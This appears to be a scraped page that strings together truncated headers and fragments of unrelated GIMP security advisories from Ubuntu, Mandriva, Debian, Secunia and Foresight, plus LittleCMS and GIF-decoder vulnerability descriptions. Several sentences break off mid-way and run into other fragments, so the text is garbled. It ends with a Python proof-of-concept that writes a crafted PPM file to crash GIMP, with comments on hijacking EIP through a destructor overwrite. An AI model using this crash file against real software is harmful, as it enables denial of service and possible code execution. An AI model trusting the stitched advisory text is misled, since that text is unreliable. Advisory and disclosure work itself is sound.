gimp
===========================================================
Ubuntu Security Notice USN-1109-1 April 13, 2011
gimp vulnerabilities
CVE-2010-4540, CVE-2010-4541, CVE-2010-4542, CVE-2010-4543
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 8.04 LTS
Ubuntu 9.10
Mandriva Linux Security Advisory MDVSA-2011:103
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : May 29, 2011
Affected: 2009.0, 2010.1, Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
===========================================================
Ubuntu Security Notice USN-880-1 January 07, 2010
gimp vulnerabilities
CVE-2009-1570, CVE-2009-3909
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 8.04 LTS
Ubuntu 8.10
======================================================================
Secunia Research 17/11/2009
- Gimp PSD Image Parsing Integer Overflow Vulnerability -
======================================================================
Table of Contents
Affected Software
===========================================================
Ubuntu Security Notice USN-494-1 August 02, 2007
gimp vulnerability
CVE-2006-4519
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 6.10
======================================================================
Secunia Research 12/11/2009
- Gimp BMP Image Parsing Integer Overflow Vulnerability -
======================================================================
Table of Contents
Affected Software
Debian Security Advisory DSA-2426-1 security@debian.org
http://www.debian.org/security/ Florian Weimer
March 06, 2012 http://www.debian.org/security/faq
-------------------------------------------------------------------------
Package : gimp
Vulnerability : several
Problem type : local
Debian-specific: no
CVE ID : CVE-2010-4540 CVE-2010-4541 CVE-2010-4542 CVE-2010-4543
CVE-2011-1782 CVE-2011-2896
Mandriva Linux Security Advisory MDVSA-2009:332-1
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : April 28, 2010
Affected: 2009.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDVSA-2009:332
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : December 11, 2009
Affected: 2009.1, 2010.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDVSA-2011:110
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : June 17, 2011
Affected: 2009.0, Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDKSA-2007:170
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : August 23, 2007
Affected: 2007.0, 2007.1, Corporate 3.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDVSA-2009:296
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : November 13, 2009
Affected: 2009.1, 2010.0, Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDVSA-2011:167
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : November 4, 2011
Affected: 2010.1, 2011., Enterprise Server 5.0
_______________________________________________________________________
Problem Description:
Mandriva Linux Security Advisory MDVSA-2009:296-1
http://www.mandriva.com/security/
_______________________________________________________________________
Package : gimp
Date : December 11, 2009
Affected: 2008.0
_______________________________________________________________________
Problem Description:
Published: 2007-08-01
Rating: Minor
Updated Versions:
gimp=/foresight.rpath.org@fl:1-devel//1/2.3.19-1-1
group-dist=/foresight.rpath.org@fl:1-devel//1/1.3.2-0.6-5
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2949
http://issues.foresightlinux.org/browse/FL-457
Background
==========
LittleCMS, or short lcms, is a color management system for working with
ICC profiles. It is used by many applications including GIMP and
Firefox.
Affected packages
=================
(CVE-2010-2432).
The LZW decompressor in the LWZReadByte function in giftoppm.c in
the David Koblas GIF decoder in PBMPLUS, as used in the gif_read_lzw
function in filter/image-gif.c in CUPS before 1.4.7, the LZWReadByte
function in plug-ins/common/file-gif-load.c in GIMP 2.6.11 and earlier,
the LZWReadByte function in img/gifread.c in XPCE in SWI-Prolog 5.10.4
and earlier, and other products, does not properly handle code words
that are absent from the decompression table when encountered, which
allows remote attackers to trigger an infinite loop or a heap-based
buffer overflow, and possibly execute arbitrary code, via a crafted
errors as well as dangerous memory leaks. Decoding a specially crafted
image file will result in unexpected process termination, Denial Of
Service conditions or arbitrary code execution due to stack overflow.
LittleCMS is used by several Open Source projects including OpenJDK,
Firefox and GIMP.
Affected version:
LittleCMS <= 1.17
Desktop i386
import struct
w = open("crash.ppm","wb")
w.write("""P3
#CREATOR: The GIMP's PNM Filter Version
1.0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA""")
# This exploit is not trivial, because the function PPM::ppmHeader()
# doesn't return immediately, and we must modify internal variables to
# cause an overwrite of a C++ string destructor executed at the end of the
# function to gain control of EIP